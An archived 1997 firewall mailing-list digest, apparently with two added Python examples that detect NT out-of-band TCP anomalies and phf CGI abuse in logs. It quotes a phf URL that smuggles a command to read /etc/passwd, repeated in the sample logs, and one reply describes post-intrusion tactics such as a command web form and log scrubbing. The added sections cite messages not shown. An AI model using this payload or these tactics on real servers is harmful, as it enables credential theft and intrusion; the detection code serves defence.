Received: by cheops.anu.edu.au (1.37.109.16/16.2) id AA140251180; Fri, 6 Jun 1997 06:06:21 +1000 From: Darren Reed Subject: Re: [FW1] Out of Band Data Attack against NT-Hosts To: adam@homeport.org (Adam Shostack) Date: Fri, 6 Jun 1997 06:06:20 +1000 (EST) Cc: bdboyle@att.com, jk@stallion.ee, firewalls@GreatCircle.COM In-Reply-To: <199706051640.MAA06916@homeport.org> from "Adam Shostack" at Jun 5, 97 12:40:33 pm X-Mailer: ELM [version 2.4 PL23] Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk In some mail from Adam Shostack, sie said: > > A friend suggests that the problem may be that the FW1 is > passing code upwards to the NT stack. FW1 sits beneath the stack, and > intercepts packets before they can do damage. However, if you > configure the firewall to allow packets to the NT stack, then NT will > crash. Or any NT stack that it lets packets through to... 
(I'm not sure if you mean packets targetted for the NT FW itself or hosts behind...) > I'll point out that if this is so, then an Application Proxy* > probably would not exhibit the same behavior, since it would rebuild > the IP packet, instead of sending the OOB packet on to its > destination when it hits an "OK" rule. Ummm, the application proxy can not protect itself, but if the FW is patched, then it does (should) protect all services behind it. Darren From owner-firewalls-outgoing Thu Jun 5 17:01:08 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id NAA18852 for firewalls-outgoing; Thu, 5 Jun 1997 13:19:26 -0700 (PDT) Received: from miles.greatcircle.com (miles.greatcircle.com [198.102.244.34]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id NAA18586 for ; Thu, 5 Jun 1997 13:18:21 -0700 (PDT) Received: from mycroft.GreatCircle.COM (mycroft.greatcircle.com [198.102.244.35]) by miles.greatcircle.com (8.8.5/Miles-970308-2) with ESMTP id NAA16445 for ; Thu, 5 Jun 1997 13:07:17 -0700 (PDT) Received: from scribe.cc.purdue.edu by mycroft.GreatCircle.COM (8.8.5/SMI-4.1/Brent-970426) id NAA18001; Thu, 5 Jun 1997 13:01:30 -0700 (PDT) Received: from ia01.freh.purdue.edu by scribe.cc.purdue.edu; Thu, 5 Jun 97 15:04:09 -0500 Comments: Authenticated sender is From: "Michael S Hines" Organization: Purdue University To: "Sameer R. Manek" Date: Thu, 5 Jun 1997 15:06:10 -0500 MIME-Version: 1.0 Content-type: text/plain; charset=US-ASCII Content-transfer-encoding: 7BIT Subject: Re: psswd HACK Reply-to: mshines@purdue.edu CC: firewalls@GreatCircle.COM X-mailer: Pegasus Mail for Win32 (v2.42) Message-Id: <33971bb92e3f002@scribe.cc.purdue.edu> Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > This is how the exploit is done > http://"name of server"/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd > But that's not really important. Lets assume they got your passwd file. 
> That means they have the option to crack on that passwd file, lets assume > they did that too. > > They know in theory know the login and password of every one on that > machine. I'll bet the login names and password of people on your webserver > are the same as their login/password as other machines on your network. > Does this cause concern? it should. Given the fact that they ran the phf > script in april, they've had atleast a month to run crack. > > Assume that your webserver has been compromised and they have had a > sniffer running on that box for a month, what would you do? You need to > think about the worstcase senerio and work backwards instead of thinking > 'oh all they got was my password file' And your web pages are only protected using the UNIX system security - correct? Have you noticed any new web pages yet? Knowing the ID/PW will get them in wiht FTP to upload new web pages...I'd be worried about a web attack. ----------------------------------------------------------------- Internet: mshines@purdue.edu * Michael S. Hines, CDP, CFE Voice: (765) 494-5845 * Sr. Information Systems Auditor FAX: (765) 496-1814 * Purdue University if AC 765 doesn't work, try 317 * 1065 Freehafer Hall * West Lafayette, IN 47907-1065 All views are my own and do not reflect Purdue University policy. 
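Returning to the OOB thread above: the Microsoft readme that Eric Tebelak quotes gives the exact shape of the offending segment (URG flag set, urgent pointer at the end of the frame, no normal data after it), and Daniel's reply shows how easy it is to mistake this for an IP option when it is in fact a TCP header field. The following is an added example, not code from the list, from Check Point or from Microsoft, showing what a sensor or packet-filter hook would check: parse the TCP header, look at the URG bit and the urgent pointer, and compare the pointer with the payload length. The segments it inspects are constructed inline with `build_segment()`; they are not captured traffic.

```python
"""Flag TCP segments shaped like the NT "out of band" crash described in
the readme quoted in this thread: URG set, urgent pointer reaching the end
of the segment, no normal data following.

Added example for the thread; build_segment() constructs the test traffic.
"""
import struct

TCP_URG = 0x20   # URG bit in the TCP flags field
TCP_ACK = 0x10
TCP_PSH = 0x08


def build_segment(sport, dport, flags, urg_ptr, payload, options=b""):
    """Construct a TCP segment (header + payload) for testing.  Sequence,
    ack and checksum are left zero; the detector does not look at them."""
    if len(options) % 4:
        raise ValueError("TCP options must be padded to a 4-byte multiple")
    data_offset_words = 5 + len(options) // 4
    off_flags = (data_offset_words << 12) | (flags & 0x1FF)
    header = struct.pack("!HHIIHHHH", sport, dport, 0, 0, off_flags, 8192, 0, urg_ptr)
    return header + options + payload


def parse_tcp(segment):
    """Parse the TCP header; return ports, flags, urgent pointer and the
    payload that follows the header and any options."""
    if len(segment) < 20:
        raise ValueError("truncated TCP header")
    sport, dport, _seq, _ack, off_flags, _win, _csum, urg_ptr = struct.unpack(
        "!HHIIHHHH", segment[:20])
    data_offset = (off_flags >> 12) * 4
    if data_offset < 20 or data_offset > len(segment):
        raise ValueError("bad data offset %d" % data_offset)
    return {
        "sport": sport,
        "dport": dport,
        "flags": off_flags & 0x1FF,
        "urg_ptr": urg_ptr,
        "payload": segment[data_offset:],
    }


def is_oob_anomaly(segment):
    """True when URG is set and the urgent pointer leaves no normal data
    after the urgent data.  RFC 793 reads the pointer as the offset of the
    octet *following* the urgent data (urg_ptr == len(payload) means "ends
    at the frame boundary"); RFC 1122 reads it as the *last* urgent octet
    (urg_ptr == len(payload) - 1).  The comparison covers both readings,
    and an URG segment with an empty payload is flagged as well."""
    tcp = parse_tcp(segment)
    if not tcp["flags"] & TCP_URG:
        return False
    return tcp["urg_ptr"] >= len(tcp["payload"]) - 1


def scan(segments, only_port=None):
    """Return indexes of anomalous segments.  only_port restricts the check
    to one destination port (the thread mentions 139/NetBIOS); None checks
    every port, which is the safer default for a sensor."""
    hits = []
    for i, seg in enumerate(segments):
        if only_port is not None and parse_tcp(seg)["dport"] != only_port:
            continue
        if is_oob_anomaly(seg):
            hits.append(i)
    return hits


# Constructed sample traffic: one crash-shaped segment to port 139, one
# legitimate urgent segment with ordinary data after the urgent byte, and
# one plain data segment without URG.
SAMPLES = [
    build_segment(1025, 139, TCP_URG | TCP_ACK | TCP_PSH, 1, b"x"),
    build_segment(1026, 23, TCP_URG | TCP_ACK, 1, b"\xff\xf4hello"),
    build_segment(1027, 80, TCP_ACK | TCP_PSH, 0, b"GET / HTTP/1.0\r\n\r\n"),
]

if __name__ == "__main__":
    for i in scan(SAMPLES):
        t = parse_tcp(SAMPLES[i])
        print("segment %d -> port %d: URG set, urg_ptr=%d, payload=%d bytes, "
              "no normal data after the urgent data"
              % (i, t["dport"], t["urg_ptr"], len(t["payload"])))
```

The point of the check is that it is entirely a TCP-header decision: nothing in the IP options has to be present, which is why a filter that drops "packets with IP options set" does not stop it. The two-reading tolerance in `is_oob_anomaly` means a sensor does not miss the segment because a sender followed RFC 1122 rather than RFC 793.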
From owner-firewalls-outgoing Thu Jun 5 17:07:26 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id OAA26457 for firewalls-outgoing; Thu, 5 Jun 1997 14:00:59 -0700 (PDT)
Received: from compute.com (compute.compute.com [192.215.246.2]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id OAA26420 for ; Thu, 5 Jun 1997 14:00:41 -0700 (PDT)
Received: by compute.com (4.1/SMI-4.1) id AA05091; Thu, 5 Jun 97 14:04:41 PDT
Message-Id: <9706052104.AA05091@compute.com>
From: rob@compute.com (Robert Roell -Network Intensive)
Date: Thu, 5 Jun 1997 14:04:41 -0700
X-Mailer: Mail User's Shell (7.2.3 5/22/91)
To: syscrash@milehigh.net, firewalls@greatcircle.com
Subject: Re: Raptor firewall
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Brien,

First let's explain that you need to split your DNS entities into two
parts, public and private. Once you have done this, then you need to
construct a DNS architecture that will provide all DNS queries (Internet
and your public and private) to your internal systems, while only
providing DNS queries for the public information to the 'Net.

Classically, this is done through a "dual-level" DNS, where you have an
internal DNS server providing only answers to private queries, and an
external DNS server providing only answers to public queries for your
domain. To accomplish this, one sets up the external DNS on the Raptor
system, and then the internal DNS server should have a "forwarders"
directive in your named.boot file pointing to the Raptor system for
anything it does not know about. This is sometimes accomplished through
using a "caching-only" DNS server on the Raptor system when you have your
ISP providing your public DNS services for your domain.

With EagleNT4.0, Raptor provides a "dnsd" that can accomplish all of this
on the Raptor system (i.e. public and private info from one server), while
knowing when to allow access queries for private DNS information. In this
scenario, I would recommend integrating this with your current DNS through
the use of the "forwarders" directive in your named.boot file on your
internal server. Then either use the dnsd for your public DNS, or just set
up the forwarders to point to your ISP if they are providing your DNS
primary for you.

If you look in the EagleNT4.0 docs, there should be a full explanation
(with pictures) of the "dual-level" DNS.

HTH,
rob

] [On Jun 5, Brian Delgado wrote:]
] Subject: Raptor firewall
] I am kind of a beginner at this so I apologize if this question is
] basic, but I figured this would be the best forum to get a valid answer.
] Here is my question: I am setting up Raptor on a Windows NT 4.0 server.
] I am currently running DNS on a SUN platform for internal name
] resolution. I realize that Raptor is an application gateway. Does this
] mean I have to run my name server on the Bastion host or can I continue
] to run it where I am currently?
] Any help would be appreciated.
]
] Brien Delgado
]-- End of excerpt from --

-------------------------------------------------------------
N E T W O R K   I N T E N S I V E
A Member of the Verio Group                      www.ni.net
Robert Roell
Senior Internet Systems Engineer                 rob@compute.com
Phone 714-450-8400
-------------------------------------------------------------

From owner-firewalls-outgoing Thu Jun 5 18:31:45 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id JAA05653 for firewalls-outgoing; Thu, 5 Jun 1997 09:16:07 -0700 (PDT)
Received: from garanti1.garanti.com.tr (garanti1.garanti.com.tr [194.54.51.100]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id JAA05464 for ; Thu, 5 Jun 1997 09:15:23 -0700 (PDT)
Received: from Mailhub by garanti1.garanti.com.tr id AA27158; Thu, 5 Jun 1997 19:19:38 +0400
Received: from GarantiUser by GarantiMailServer id AA10886; Thu, 5 Jun 1997 19:18:53 +0400
Received: from fw1.fw.garanti.com.tr by manage1.fw.garanti.com.tr (AIX 4.1/UCB 5.64/4.03) id AA34532; Thu, 5 Jun 1997 19:16:41 +0400
Message-Id: <339773DE.3884@garanti.com.tr>
Date: Thu, 05 Jun 1997 19:20:14 -0700
From: Cihan Subasi
Reply-To: csubasi@garanti.com.tr
Organization: Garanti Ticaret
X-Mailer: Mozilla 3.0Gold (Win16; I)
Mime-Version: 1.0
To: Firewall Mailing List
Subject: Limiting Mail size..
Content-Type: text/plain; charset=iso-8859-9
Content-Transfer-Encoding: 7bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

It is off topic, but how can I limit inbound and outbound email size...

Thanks,

--
***************************************************************
Cihan Subasi
Garanti Ticaret, Istanbul Turkey
email= cihans@garanti.com.tr or csubasi@garanti.com.tr
Phone= +902126570404
Fax  = +902126570473
***************************************************************

From owner-firewalls-outgoing Thu Jun 5 18:37:47 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id MAA14442 for firewalls-outgoing; Thu, 5 Jun 1997 12:50:27 -0700 (PDT)
Received: (mcb@localhost) by honor.greatcircle.com (8.8.5/Honor-970427-1) id MAA14430 for firewalls@greatcircle.com; Thu, 5 Jun 1997 12:50:23 -0700 (PDT)
Received: from hdshq.com (wwtk.hdshq.com [206.215.16.130]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id MAA03872 for ; Mon, 2 Jun 1997 12:13:19 -0700 (PDT)
Received: from w95dev.hdshq.com ([199.228.179.37]) by hdshq.com (1/HDS MAIL SYSTEM) with SMTP id MAA30853; Mon, 2 Jun 1997 12:16:45 -0700
Message-Id: <1.5.4.32.19970602191559.0067f420@popper.hdshq.com>
X-Sender: carl@popper.hdshq.com
X-Mailer: Windows Eudora Light Version 1.5.4 (32)
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Date: Mon, 02 Jun 1997 12:15:59 -0700
To: fwtk , firewalls
From: "Carl V. Claunch"
Subject: Re: Plug-gw- One to many relationship
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

At 10:31 AM 6/2/97 -0400, Ken Kempster wrote:
>[To be removed from this list send the message "unsubscribe fwtk-users" in the
>BODY of a mail message to majordomo@ex.tis.com.]
>
>Hi all,
>
> Has anyone gotten a one to many relationship to work
>with FWTK 2.0?
>
> I want to be able to specify x.x.x.x plug-to *
> or
> x.x.x.x plug-to x.x.x.x x.x.x.x etc.
>
>
>thanx for any help.
>

What semantics are you expecting with this? We have a patch to plug-gw
that will try alternate addresses in sequence until a successful
connection occurs. It is used mainly for automating access through backup
paths. If this is what you want, I could be persuaded to have someone here
make this publicly available as a contribution.

From owner-firewalls-outgoing Thu Jun 5 18:44:05 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id LAA26289 for firewalls-outgoing; Thu, 5 Jun 1997 11:07:33 -0700 (PDT)
Received: from live-oak.cycon.com (live-oak.CYCON.COM [198.202.237.69]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id LAA26223 for ; Thu, 5 Jun 1997 11:07:15 -0700 (PDT)
Received: from localhost (ardoin@localhost) by live-oak.cycon.com (8.8.5/8.7.3) with SMTP id OAA13649; Thu, 5 Jun 1997 14:11:33 -0400 (EDT)
X-Authentication-Warning: live-oak.cycon.com: ardoin owned process doing -bs
Date: Thu, 5 Jun 1997 14:11:33 -0400 (EDT)
From: Cy Ardoin
To: "Jonathan M. Bresler"
cc: Firewalls@GreatCircle.COM
Subject: Re: PIX and FW-1 (packet filter Question)
In-Reply-To: <199706051718.NAA08468@kryten.frb.gov>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

On Thu, 5 Jun 1997, Jonathan M. Bresler wrote:

> > >I don't think there is anything an application firewall can
> > >do that can't also be done by a "packet filter" firewall. The
> >
> trivial example:
> a smtp application level proxy can disable the "debug" command
> for every sendmail behind that firewall.

Finding and removing the "debug" command from smtp connections at the
packet layer isn't much different than finding and altering the PORT and
PASV part of the FTP command, and all the NAT style packet filters modify
the FTP commands. It's not something packet filters do, but it is no more
difficult than many of the things they already do.

Thanks

--
Cy Ardoin                                  ardoin@cycon.com
--------------------------------------------------------------------
-- Cypress Consulting, Inc.              | Voice: 703/383-0247    ---
-- 4101 Olympic Way, Alexandria VA       | Fax:   703/383-0320    ----
--   and                                 |                        ----
-- 11240 Waples Mill Road, Suite 403,    | http://www.cycon.com/  ---
-- Fairfax, VA 22030                     |                        --
--------------------------------------------------------------------

From owner-firewalls-outgoing Thu Jun 5 19:06:14 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id IAA00108 for firewalls-outgoing; Thu, 5 Jun 1997 08:43:31 -0700 (PDT)
Received: from onshore.com (onShore.com [206.69.88.1]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id IAA29980 for ; Thu, 5 Jun 1997 08:43:21 -0700 (PDT)
Received: (from craig@localhost) by onshore.com (8.8.5/8.7.3) id KAA01085; Thu, 5 Jun 1997 10:47:25 -0500
Date: Thu, 5 Jun 1997 10:47:25 -0500
From: Craig Brozefsky
Subject: RE: PIX and Firewall-1
To: Bill Stout
cc: firewalls@GreatCircle.COM
In-Reply-To: <2.2.32.19970604211523.0070ff68@vaxf.pios.com>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

On Wed, 4 Jun 1997, Bill Stout wrote:

> Peter Carlson writes....
> >in what way are application level gateways more secure than, say, FW-1 or PIX?
> >There are certainly capabilities that can be provided via application
> >proxies that can't be provided by any filter-based technologies, but what
> >types of attacks are a FW-1 or a PIX vulnerable to that application
> >proxies aren't?

You should check out comp.security.firewalls for a good discussion of
these issues. PIX is a NAT capable router with a few filtering rules
thrown in; such things are hardly safe, architecturally and
implementation wise. NAT is NOT, I repeat NOT! a security tool, and should
not be treated as a part of your security infrastructure. Nearly all NAT
tools are not designed with security in mind.

> Application proxies monitor commands sent at the application layer, and
> reconstruct packets so that IP attacks can't be sent beyond the firewall.
> (From what I understand), State-based (a.k.a. enhanced extended packet
> filter) security devices inspect the first packet that comes across with
> enhanced extended filtering rules and can include additional authentication.
> If that packet passes all filtering rules, remaining packets of that session
> are passed through without inspection.

I am not sure that all SMLI firewalls use that method to determine a
packet's validity.

> Good applications for packet filter/State-based firewalls are low-security
> internet feeds and fast low-latency intranet (10/100/155MB/...) security
> filtering. Not everyone needs a full application proxy firewall, a subject
> that comes up when I visit Mom-and-Pop small businesses that want a single
> feed for their 10 PCs.

I agree, we actually use Linux boxen in such situations. Our company has
a support infrastructure in place to keep those machines in good shape,
they are cheap for the client, and we have very intimate knowledge of
their workings (most of us in the company are Linux fans). We've been
doing this for a few years now I believe. It does routing, email, and NAT
for their PC/MAC network and often handles dial-in and printing services
as well. All parties involved know that this is not 'the most secure'
solution, but it's the most cost effective and flexible.

> IMHO - State-based firewalls are 'only' packet filters, and for the
> corporate environment should not replace the traditional proxy server, but
> work in conjunction with one.

I agree. It would rock if TIS got their IP packet filters really whacked
out, with all kinds of filtering options on packet headers. It works well
now, but I would like to really have the ability to write up some insane
rulesets.

Craig Brozefsky                 craig@onshore.com
onShore Inc.                    http://www.onshore.com/~craig
Development Team                p_priority=PFUN+(p_work/4)+(2*p_cash)

From owner-firewalls-outgoing Thu Jun 5 19:14:55 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id JAA04343 for firewalls-outgoing; Thu, 5 Jun 1997 09:07:53 -0700 (PDT)
Received: from gargoyle.clark.net (pm2-112.dcwt.infi.net [208.136.65.112]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id JAA04259 for ; Thu, 5 Jun 1997 09:07:36 -0700 (PDT)
Received: (qmail 6383 invoked by uid 500); 5 Jun 1997 16:14:44 -0000
Date: Thu, 5 Jun 1997 12:14:44 -0400 (EDT)
From: "Paul D. Robertson"
X-Sender: proberts@gargoyle
To: Stan Wnuck
cc: firewalls@GreatCircle.COM
Subject: Re: psswd HACK
In-Reply-To: <199706051407.HAA20909@honor.greatcircle.com>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

On Thu, 5 Jun 1997, Stan Wnuck wrote:

> OK! Let's say that they did get my passwd file.....
> How much damage can they do if I have a firewall in place that my web server
> sits behind? The only services available from this host to the Internet is

Well, given the fact that they can execute any command on the web server,
how much damage can someone with an account on the web server do? Can
that machine initiate connections to other hosts other than to SMTP ports
or for DNS resolution? If so, makes a great place to launch attacks from.
Are there other machines behind that firewall? Suddenly there is a way to
attack those machines.....

> http, dns, and smtp. So services like ftp and telnet would be denied if they
> tried. Is there something I am missing?

Don't need telnet, just install a web form that takes commands in, and
echoes the output. Use PUT to upload files, and bingo, you don't need
telnet, FTP, or anything else. Or keep using the current CGI hole to
execute commands. The only thing missing is adding a crontab entry to
scrub the log files, and that's fairly trivial.

Are all the id/passwords on that machine unique to that machine?

Paul
-----------------------------------------------------------------------------
Paul D. Robertson      "My statements in this message are personal opinions
proberts@clark.net      which may have no basis whatsoever in fact."
PSB#9280

From owner-firewalls-outgoing Thu Jun 5 19:38:48 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id LAA29533 for firewalls-outgoing; Thu, 5 Jun 1997 11:25:13 -0700 (PDT)
Received: from mail.ruhrgebiet.individual.net (in-ruhr.ruhr.de [141.39.224.38]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id LAA29487 for ; Thu, 5 Jun 1997 11:25:02 -0700 (PDT)
Received: (from admin@localhost) by mail.ruhrgebiet.individual.net (8.8.5/8.8.5) with UUCP id UAA03300; Thu, 5 Jun 1997 20:00:43 +0200 (MET DST)
Received: from hostname.devnull.ruhr.de (benedikt@hostname.devnull.ruhr.de [192.168.122.11]) by devnull.local.net (8.6.12/8.6.9) with ESMTP id RAA01169; Tue, 3 Jun 1997 17:54:08 +0200
Received: (from benedikt@localhost) by hostname.devnull.ruhr.de (8.7.5/8.7.3) id SAA00691; Tue, 3 Jun 1997 18:09:37 +0200
To: girsch@marben.com (Arnaud Girsch)
Cc: pnash@hanshan.bbnplanet.com, don@genroco.com, jpm@marben.be, ark@paranoid.convey.ru, tobotras@jet.msk.su, fwtk-users@tis.com, firewalls@GreatCircle.COM, ylo@cs.hut.fi
Subject: Re: ssh proxy for fwtk
References: <199706030143.SAA22532@mail.marben.com>
Content-Type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: 8bit
From: Benedikt Stockebrand
Date: 03 Jun 1997 18:09:35 +0200
In-Reply-To: girsch@marben.com's message of Mon, 2 Jun 1997 18:43:28 -0700 (PDT)
Message-ID: <87k9kbfz28.fsf@devnull.ruhr.de>
Lines: 23
X-Mailer: Gnus v5.3/Emacs 19.34
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

girsch@marben.com (Arnaud Girsch) writes:

> For example, you probably restrict X because you think that X is never secure
> and can be abused, etc ... Giving access to X within a ssh tunnel protects
> against most of the X problems, so why not giving X access then ?

I'm not sure, but what about this one: If the remote machine has been
hacked, then X forwarding can be more of a problem than help. If the
remote sshd (or /bin/*sh or whatever) has been modified to use that X
forwarding they're just about right in your local machine. And you can't
even tell because you'd need your local user's private key to decrypt
things to analyze them.

Anyone know more about this?

Ben

--
Ben(edikt)? Stockebrand      Runaway ping.de Admin---Never Ever Trust Old Friends
My name and email address are not to be added to any list used for advertising
purposes. Any sender of unsolicited advertisement e-mail to this address
implicitly agrees to pay a DM 500 fee to the recipient for proofreading services.
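Back to the psswd HACK thread (the description Michael Hines quotes from Sameer Manek, and Paul Robertson's reply about what an attacker can do with command execution on the web server). Both replies take the compromise as given; the first thing an administrator wants is to find out from the web server's own logs when it happened and from where. The following is an added example, not code from the list or from any web server vendor: it scans Common Log Format lines for the request shape quoted in the thread (a hit on `/cgi-bin/phf` whose query string carries a URL-encoded newline, which is what lets a shell command ride along), reports what was injected, and notes whether the server answered with content. The log lines are constructed for the example, not taken from any real server.

```python
"""Find phf CGI abuse in a web server access log.

Added example for the psswd HACK thread.  SAMPLE_LOG is constructed in
Common Log Format; the encoded newline (%0a / %0d) in the query string is
the tell, since a literal newline cannot appear in an HTTP request line.
"""
import re
from urllib.parse import unquote

SAMPLE_LOG = """\
10.0.0.5 - - [12/Apr/1997:03:14:07 -0500] "GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 200 1832
10.0.0.9 - - [12/Apr/1997:03:15:10 -0500] "GET /cgi-bin/phf?Qalias=smith HTTP/1.0" 200 412
10.0.0.7 - - [12/Apr/1997:03:16:41 -0500] "GET /index.html HTTP/1.0" 200 2048
10.0.0.5 - - [13/Apr/1997:22:01:02 -0500] "GET /cgi-bin/phf?Qname=%0Aid HTTP/1.0" 404 0
"""

# Common Log Format: host ident authuser [date] "request" status bytes
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) (?P<bytes>\d+|-)'
)


def find_phf_abuse(log_text):
    """Return one dict per request that hits phf with an encoded newline.
    'served' is True when the server answered 200 with a non-empty body,
    i.e. the injected command's output most likely went back to the
    requester.  Ordinary phf lookups (no newline) are not reported."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not CLF, or a malformed line; skip rather than guess
        url_path, _, query = m.group("path").partition("?")
        if not url_path.lower().endswith("/phf"):
            continue
        lowered = query.lower()
        if "%0a" not in lowered and "%0d" not in lowered:
            continue  # plain phf lookup, not an injection attempt
        decoded = unquote(query)
        # Everything after the first newline is what phf handed to the shell.
        injected = re.split(r"[\r\n]", decoded, maxsplit=1)[1].strip()
        status = int(m.group("status"))
        size = m.group("bytes")
        hits.append({
            "ip": m.group("ip"),
            "ts": m.group("ts"),
            "injected": injected,
            "status": status,
            "served": status == 200 and size not in ("-", "0"),
        })
    return hits


def source_hosts(hits):
    """Distinct requesting hosts, as a starting point for the follow-up the
    thread calls for: which accounts were exposed and where else those
    passwords are used."""
    return sorted({h["ip"] for h in hits})


if __name__ == "__main__":
    found = find_phf_abuse(SAMPLE_LOG)
    for h in found:
        print("%(ts)s %(ip)s status=%(status)d served=%(served)s injected=%(injected)r" % h)
    print("hosts:", source_hosts(found))
```

A `served` hit with `/etc/passwd` in the injected command is the evidence the thread assumes: treat the password file as taken on that date, and, as both replies say, treat every account whose password is reused on other machines as exposed too. The 404 entry shows the other useful case, a later attempt after phf was removed, which tells you the attacker came back.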
From owner-firewalls-outgoing Thu Jun 5 21:24:57 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id NAA26114 for firewalls-outgoing; Thu, 5 Jun 1997 13:58:49 -0700 (PDT) Received: from onshore.com (onShore.com [206.69.88.1]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id NAA24193 for ; Thu, 5 Jun 1997 13:48:24 -0700 (PDT) Received: (from craig@localhost) by onshore.com (8.8.5/8.7.3) id PAA07746; Thu, 5 Jun 1997 15:52:34 -0500 Date: Thu, 5 Jun 1997 15:52:32 -0500 From: Craig Brozefsky Subject: RE: [FW1] Out of Band Data Attack against NT-Hosts To: "Bryan D. Boyle" cc: Jyri Kaljundi , firewalls@GreatCircle.COM In-Reply-To: <199706051346.JAA02854@hogpb.ho.att.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Thu, 5 Jun 1997, Bryan D. Boyle wrote: > It is a bogosity with NT and not with FW1. Can't be addressed by Checkpoint, > since the OS is not in their control. They can only operate (or be as > secure as) at the least common denominator level of the underlying OS. As a vendor deploying a security product on that platform, I feel it is their responsibility, otherwise they should properly compensate for the immaturity and bugginess of their host platform, or simply not deploy. Security products in general are such a bugaboo, prone to playing ont he customers paranoia, selling with hype, scare tactics and generall IMO are very slimy when they reach the broad consumer market. Look at ADT and the home security market. > Nothing except MS code operates in the NT kernel. This problem is with > what happens when you send oob data to a stack (MS) that is tightly integrated > with the OS (FW1 runs on top of this stuff, not in it...) and the stack/OS > interface and control mechanism itself is crap. Can you name a stack ths is not tightly integrated with the kernel? > Of course, on UN*X systems, this is not the case. 
This is a signal example > of the difference between designing for peer review of your security model > and designing for what gets good trade publication reviews. Hardly the case. Unix vendors are just as prone to market influences as MS, although their code bases are usually much more stable, and more mature. People really wanted a multi-host authentication and information database for the OS, and we get NIS+, as security problematic as anything else out there. > If there is an overall architectural problem with NT as it is, then the OS > bugs matter A LOT. But, of course, those that say you can trust a black box > solution since the vendors are trustworthy are quite quiet on this regard... It's an issue for both the implementor and the consumer. > I would agree that you should ignore NT as an OS platform in a > security solution right now. Just my opinion, $.02 US, etc. Agreed. Craig Brozefsky craig@onshore.com onShore Inc. http://www.onshore.com/~craig Development Team p_priority=PFUN+(p_work/4)+(2*p_cash) From owner-firewalls-outgoing Thu Jun 5 21:27:16 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id LAA25149 for firewalls-outgoing; Thu, 5 Jun 1997 11:02:09 -0700 (PDT) Received: from buffy.isi.net (buffy.isi.net [204.71.194.215]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id LAA25127 for ; Thu, 5 Jun 1997 11:02:01 -0700 (PDT) Received: from localhost (mike@localhost) by buffy.isi.net (8.8.5/ISI-1.5) with ESMTP id LAA22857; Thu, 5 Jun 1997 11:05:16 -0700 (PDT) Date: Thu, 5 Jun 1997 11:05:16 -0700 (PDT) From: Mike Hedlund X-Sender: mike@buffy To: Daniel Strawson cc: Jyri Kaljundi , Greg Loffel , fw-1-mailinglist@us.checkpoint.com, Firewalls mailing list Subject: RE: [FW1] Out of Band Data Attack against NT-Hosts In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Content-Transfer-Encoding: 8BIT Sender: firewalls-owner@GreatCircle.COM Precedence: bulk If i remember 
correctly, the OOB attack with NT only affected port 139, NetBios. I tried it on all other tcp ports and it had no effect. So the only way Firewall-1 would be affected by it would be if it has its own bug.. although i could be mistaken.. if i am someone please correct me. :) -mike
